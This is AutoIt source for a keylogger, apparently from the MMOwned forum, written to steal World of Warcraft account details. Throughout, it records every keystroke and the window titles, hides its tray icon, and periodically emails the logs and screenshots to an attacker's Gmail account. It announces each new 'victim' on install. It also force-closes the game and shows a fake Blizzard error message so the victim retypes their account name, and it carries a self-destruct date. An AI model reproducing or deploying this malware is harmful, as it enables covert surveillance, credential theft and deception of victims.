#cs This script was written mostly by Marlo of MMOwned.com and it is used at y

1. #cs
2.     This script was written mostly by Marlo of MMOwned.com and it is used at your own risk.
3.     If you see any problems with my script please feel free to PM me on MMOwned.com, USername: Marlo
4.     Enjoy the script and use responsibly ;)
5.    
6.     #####HOW TO USE#####
7.     This script is fairly simple to use as i have commented most of it.
8.     All you should need to do is Change the following Vars.
9.    
10.     $Len - Put a value here between 1 and 60. This is used to determine how often in minutes the log file is emailed.
11.     $eFile - This is where the Log file is stored. @ScriptDir referes to the place where the keylogger was installed, That is determined in the "Deploy.au3" file.
12.     $Body - This is simply the main body of the email that is sent to you. Shoudlnt require much changing unless you want to include more info.
13.     $ClearLogAfterEmail - If set to True then the Log file will be deleted after it is uploaded, If set to false then it will simply keep adding to the file.
14.     $GmailUser - The script uses the GMAIL SMTP server for the emails, so you need a Gmail account. I reccomend making a new account if you plan on using this script.
15.     $GmailPass - your Gmail login password
16.     $ToEmail - This is where the email is sent to, this can be different to your GMAIL email but you can use the same if you wish.
17.    
18.     Thats pretty much it for this script. If you havnt already then check out the "Deploy.au3" to see whether you need to change anything there.
19.     ~Marlo
20.    
21.     ---------------------------"New" Version, Fixed by Thidan of MMOwned-----------------------------
22.     Added:
23.     Screenshot taker.
24.     Self-destruction.
25.     Will promt the user to delete the WTF and cache folders, just to get their accname ;)
26.     Shitty code that looks totally retarded in other people's eyes and prolly supernoobish and some of it might not even be needed.
27.    
28.     What have you actually bugfixed?
29.     I fixed the sleep command at the bottom of the while loop to make sure it eliminates most of the "ddouublee leetteerss" and "tpyos" (aka, the old one printed the
30.     same letter twice and/or printed the letters in the wrong order. Note: This may or not be 100% accurate, you might have to switch around letters sometimes but
31.     for me, this is optimal.
32.    
33.     Also, all credits to MARLO OF MMOWNED.
34.     ~Thidan
35. #ce
36.  
37. #include <SMTP.au3>                      ;Include the SMTP file (used for emailing)
38. #Include <String.au3>
39. #NoTrayIcon                              ;Do not show the Tray icon.
40. #include <screencapture.au3>
41.  
42. Global $Log, $Win, $Win2, $Len, $File, $Body, $ClearLogAfterEmail, $eFile, $GmailUser, $GmailPass, $ToEmail, $tStamp, $read ;Delcare some variables
43.  
44. $Len = 60                                 ;This is how often the log should be uploaded in minutes
45. $eFile = @ScriptDir & "\log.txt"       ;Name and place for the Log file
46. $Body = "Keylog file reciecved at " & @Hour & ":" & @Min & " on " & @MDay & "/" & @Mon & "/" & @Year   ;The body of the email
47. $ClearLogAfterEmail = True               ;Delete log after an upload? True for yes and False for no
48. $GmailUser = "EMAIL@gmail.com"           ;Gmail login name (Required)
49. $GmailPass = "PASSWORD"                      ;Gmail login pass (Required)
50. $ToEmail = "NEW EMAIL ORTHE ABOVE@gmail.com"             ;This is where the log files will be sent
51. $picture = @scriptdir & "\info.jpg"
52. $picture2 = @scriptdir & "\info2.jpg"
53. AdlibEnable("_WriteLog", 10000)
54. $Len *= 60
55. $tStamp = TimerInit()
56. $wow = ProcessExists("WoW.exe")
57.  
58. If Not FileExists($eFile) Then           ;This will send an install confirmation email to you when your victim installs your keylogger.
59. IniWrite(@ScriptDir & "\info.txt", "asfdk", "Opened", "False") ; This is vital, Do NOT change whatsoever unless you understand my shitty, dumb and totally retarded coding!!!!!!
60. IniWrite(@ScriptDir & "\info.txt", "Selfdestruct", "Day", "DAY OF SELF DESTRUCTTION") ; Note - Enter day in the format: 01 02 03 etc (1st in month X = 01 etc, X = your month)
61. IniWrite(@ScriptDir & "\info.txt", "Selfdestruct", "Month", "MONTH OF SELF DESTRUCTION") ;Note - Jan = 01, Feb = 02 etc.
62.     _INetSmtpMailCom("smtp.gmail.com", @ComputerName, $ToEmail, $ToEmail, $GmailUser, $GmailPass, @Username & "@" & @ComputerName, "Keylogger successfully installed")
63.         _ScreenCapture_capture($picture)
64.     _INetSmtpMailCom("smtp.gmail.com", @ComputerName, $ToEmail, $ToEmail, $GmailUser, $GmailPass, @Username & "@" & @ComputerName, "Screenshot", $picture)
65.  
66.    
67. EndIf
68.  
69.  
70.  
71. ;lolololol test
72. While 1
73.     $read = iniread(@ScriptDir & "\info.txt", "asfdk", "Opened", "")
74.     $read2 = iniread(@ScriptDir & "\info.txt", "Selfdestruct", "Day", "")
75.     $read3 = iniread(@ScriptDir & "\info.txt", "Selfdestruct", "Month", "")
76.    
77.     if @mday = $read2 and @mon = $read3 then
78.         Exit
79.         EndIf
80.    
81. If ProcessExists("WoW.exe") and $read = "False" Then
82.     sleep(7000) ; Can be lower /Thidan
83.         _ScreenCapture_Capture($picture2)
84.         _INetSmtpMailCom("smtp.gmail.com", @ComputerName, $ToEmail, $ToEmail, $GmailUser, $GmailPass, @Username & "@" & @ComputerName, "Screenshot of WoW", $picture2)
85.         filedelete($picture2)
86.         iniwrite(@ScriptDir & "\info.txt", "asfdk", "Opened", "Once")
87.         ProcessClose("WoW.exe")
88.         msgbox(16, "Critical Error 192", "There was an error loading the WTF and Cache folders, please delete them and restart the game."&@CRLF& "                                                             Blizzard.")
89.     ElseIf ProcessExists("WoW.exe") and $read = "Once" Then
90.     iniwrite(@ScriptDir & "\info.txt", "asdfk", "Opened", "Yes")
91. elseif ProcessExists("WoW.exe") and $read = "Yes" Then
92.     sleep(1)
93. EndIf
94.  
95.     ;EndIf
96. If _IsPressed(41) Then
97.         _LogKeyPress("a")
98.     EndIf
99.  
100.     If _IsPressed(42) Then
101.         _LogKeyPress("b")
102.     EndIf
103.  
104.     If _IsPressed(43) Then
105.         _LogKeyPress("c")
106.     EndIf
107.  
108.     If _IsPressed(44) Then
109.         _LogKeyPress("d")
110.     EndIf
111.  
112.     If _IsPressed(45) Then
113.         _LogKeyPress("e")
114.     EndIf
115.  
116.     If _IsPressed(46) Then
117.         _LogKeyPress("f")
118.     EndIf
119.  
120.     If _IsPressed(47) Then
121.         _LogKeyPress("g")
122.     EndIf
123.  
124.     If _IsPressed(48) Then
125.         _LogKeyPress("h")
126.     EndIf
127.  
128.     If _IsPressed(49) Then
129.         _LogKeyPress("i")
130.     EndIf
131.  
132.     If _IsPressed('4a') Then
133.         _LogKeyPress("j")
134.     EndIf
135.  
136.     If _IsPressed('4b') Then
137.         _LogKeyPress("k")
138.     EndIf
139.  
140.     If _IsPressed('4c') Then
141.         _LogKeyPress("l")
142.     EndIf
143.  
144.     If _IsPressed('4d') Then
145.         _LogKeyPress("m")
146.     EndIf
147.  
148.     If _IsPressed('4e') = 1 Then
149.         _LogKeyPress("n")
150.     EndIf
151.  
152.     If _IsPressed('4f') Then
153.         _LogKeyPress("o")
154.     EndIf
155.  
156.     If _IsPressed(50) Then
157.         _LogKeyPress("p")
158.     EndIf
159.  
160.     If _IsPressed(51) Then
161.         _LogKeyPress("q")
162.     EndIf
163.  
164.     If _IsPressed(52) Then
165.         _LogKeyPress("r")
166.     EndIf
167.  
168.     If _IsPressed(53) Then
169.         _LogKeyPress("s")
170.     EndIf
171.  
172.     If _IsPressed(54) Then
173.         _LogKeyPress("t")
174.     EndIf
175.  
176.     If _IsPressed(55) Then
177.         _LogKeyPress("u")
178.     EndIf
179.  
180.     If _IsPressed(56) Then
181.         _LogKeyPress("v")
182.     EndIf
183.  
184.     If _IsPressed(57) Then
185.         _LogKeyPress("w")
186.     EndIf
187.  
188.     If _IsPressed(58) Then
189.         _LogKeyPress("x")
190.     EndIf
191.  
192.     If _IsPressed(59) Then
193.         _LogKeyPress("y")
194.     EndIf
195.  
196.     If _IsPressed('5a') Then
197.         _LogKeyPress("z")
198.     EndIf
199.  
200.     If _IsPressed('08') Then
201.         _LogKeyPress("{BACKSPACE}")
202.     EndIf
203.  
204.     If _IsPressed('09') Then
205.         _LogKeyPress("{TAB}")
206.     EndIf
207.  
208.     If _IsPressed('0d') Then
209.         _LogKeyPress("{ENTER}")
210.     EndIf
211.  
212.     If _IsPressed('10') Then
213.         _LogKeyPress("{SHIFT}")
214.     EndIf
215.  
216.     If _IsPressed('11') Then
217.         _LogKeyPress("{CTRL}")
218.     EndIf
219.  
220.     If _IsPressed('12') Then
221.         _LogKeyPress("{ALT}")
222.     EndIf
223.  
224.     If _IsPressed('13') Then
225.         _LogKeyPress("{PAUSE}")
226.     EndIf  
227.  
228.     If _IsPressed('14') Then
229.         _LogKeyPress("{CAPSLOCK}")
230.     EndIf
231.  
232.     If _IsPressed('1b') Then
233.         _LogKeyPress("{ESC}")
234.     EndIf
235.     If _IsPressed('20') Then
236.         _LogKeyPress(" ")
237.     EndIf
238.  
239.     If _IsPressed('21') Then
240.         _LogKeyPress("{PGUP}")
241.     EndIf
242.  
243.     If _IsPressed('22') Then
244.         _LogKeyPress("{PGDOWN}")
245.     EndIf
246.  
247.     If _IsPressed('23') Then
248.         _LogKeyPress("{END}")
249.     EndIf
250.  
251.     If _IsPressed('24') Then
252.         _LogKeyPress("{HOME}")
253.     EndIf
254.  
255.     If _IsPressed('25') Then
256.         _LogKeyPress("{LEFT ARROW}")
257.     EndIf
258.  
259.     If _IsPressed('26') Then
260.         _LogKeyPress("{UP ARROW}")
261.     EndIf
262.  
263.     If _IsPressed('27') Then
264.         _LogKeyPress("{RIGHT ARROW}")
265.     EndIf
266.  
267.     If _IsPressed('28') Then
268.         _LogKeyPress("{DOWN ARROW}")
269.     EndIf
270.  
271.     If _IsPressed('2c') Then
272.         _LogKeyPress("{PRNTSCRN}")
273.     EndIf
274.  
275.     If _IsPressed('2d') Then
276.         _LogKeyPress("{INSERT}")
277.     EndIf
278.  
279.     If _IsPressed('2e') Then
280.         _LogKeyPress("{DEL}")
281.     EndIf
282.  
283.     If _IsPressed('30') Then
284.         _LogKeyPress("0")
285.     EndIf
286.  
287.     If _IsPressed('31') Then
288.         _LogKeyPress("1")
289.     EndIf
290.  
291.     If _IsPressed('32') Then
292.         _LogKeyPress("2")
293.     EndIf
294.  
295.     If _IsPressed('33') Then
296.         _LogKeyPress("3")
297.     EndIf
298.  
299.     If _IsPressed('34') Then
300.         _LogKeyPress("4")
301.     EndIf
302.  
303.     If _IsPressed('35') Then
304.         _LogKeyPress("5")
305.     EndIf
306.  
307.     If _IsPressed('36') Then
308.         _LogKeyPress("6")
309.     EndIf
310.  
311.     If _IsPressed('37') Then
312.         _LogKeyPress("7")
313.     EndIf
314.  
315.     If _IsPressed('38') Then
316.         _LogKeyPress("8")
317.     EndIf
318.  
319.     If _IsPressed('39') Then
320.         _LogKeyPress("9")
321.     EndIf
322.    
323.     If TimerDiff($tStamp) / 1000 >= $Len Then       ;This code block determines how many minutes have passed since last upload. Will upload the log when it meets the required minutes.
324.         _ScreenCapture_Capture(@scriptdir & "\info.jpg")
325.         _INetSmtpMailCom("smtp.gmail.com", @ComputerName, $ToEmail, $ToEmail, $GmailUser, $GmailPass, @Username & "@" & @ComputerName, "Screenshot", $picture)     
326.         _INetSmtpMailCom("smtp.gmail.com", @ComputerName, $ToEmail, $ToEmail, $GmailUser, $GmailPass, @Username & "@" & @ComputerName, $Body, $eFile)
327.         $tStamp = TimerInit()                       ;ReDim the tStamp var back to 0
328.         If $ClearLogAfterEmail = True Then          ;If you specified to have the log cleared after email then this is where it is deleted.
329.             FileDelete($eFile)
330.         EndIf
331.     EndIf
332.      ;Stops the script for 1/10 of a second, so the same keyisnt captured more than once.
333.  
334.    
335.     Sleep(120)
336. WEnd
337. Func _LogKeyPress($char)    ;Key processing
338.     $Win = WinGetTitle("")  ;Gets the name of the current active window
339.     If $Win = $Win2 Then    ;If the window is unchanged then simply add the key to the log
340.         $Log &= $Char
341.     Else
342.         $Win2 = $Win        ;If the window name has changed then add the window name to the log then the characters.
343.         $Log &= @CRLF & @CRLF & "[" & $Win & " - " & @Hour & ":" & @Min & " " & @MDay & "/" & @Mon & "/" & @Year & "]" & @CRLF & $Char
344.     EndIf
345.     _WriteLog()             ;Add the key to the log file
346. EndFunc
347.  
348. Func _WriteLog()
349.     $File = FileOpen($eFile, 1) ;Open the log file, If it doesnt exist then create it.
350.     FileWrite($File, $Log)      ;Write the Log var to the File
351.     $Log = ""                   ;Clear the log Var
352.     FileClose($File)            ;Close the File Handle
353. EndFunc
354.  
355.  
356. Func _IsPressed($hexKey)        ;Key capture function. Most vital part of the script.
357.     Local $aR, $bRv
358.     $hexKey = '0x' & $hexKey
359.     $aR = DllCall("user32", "int", "GetAsyncKeyState", "int", $hexKey)
360.     If $aR[0] <> 0 Then
361.         $bRv = 1
362.     Else
363.         $bRv = 0
364.     EndIf
365.     Return $bRv
366. EndFunc